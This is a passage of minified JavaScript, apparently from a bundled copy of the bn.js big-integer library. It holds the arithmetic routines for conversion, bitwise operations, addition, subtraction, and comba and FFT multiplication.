h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,fa=0|P[2],Jt=8191&fa,Gt=fa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ua=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ua>>>26)|0,ua&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ua,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var 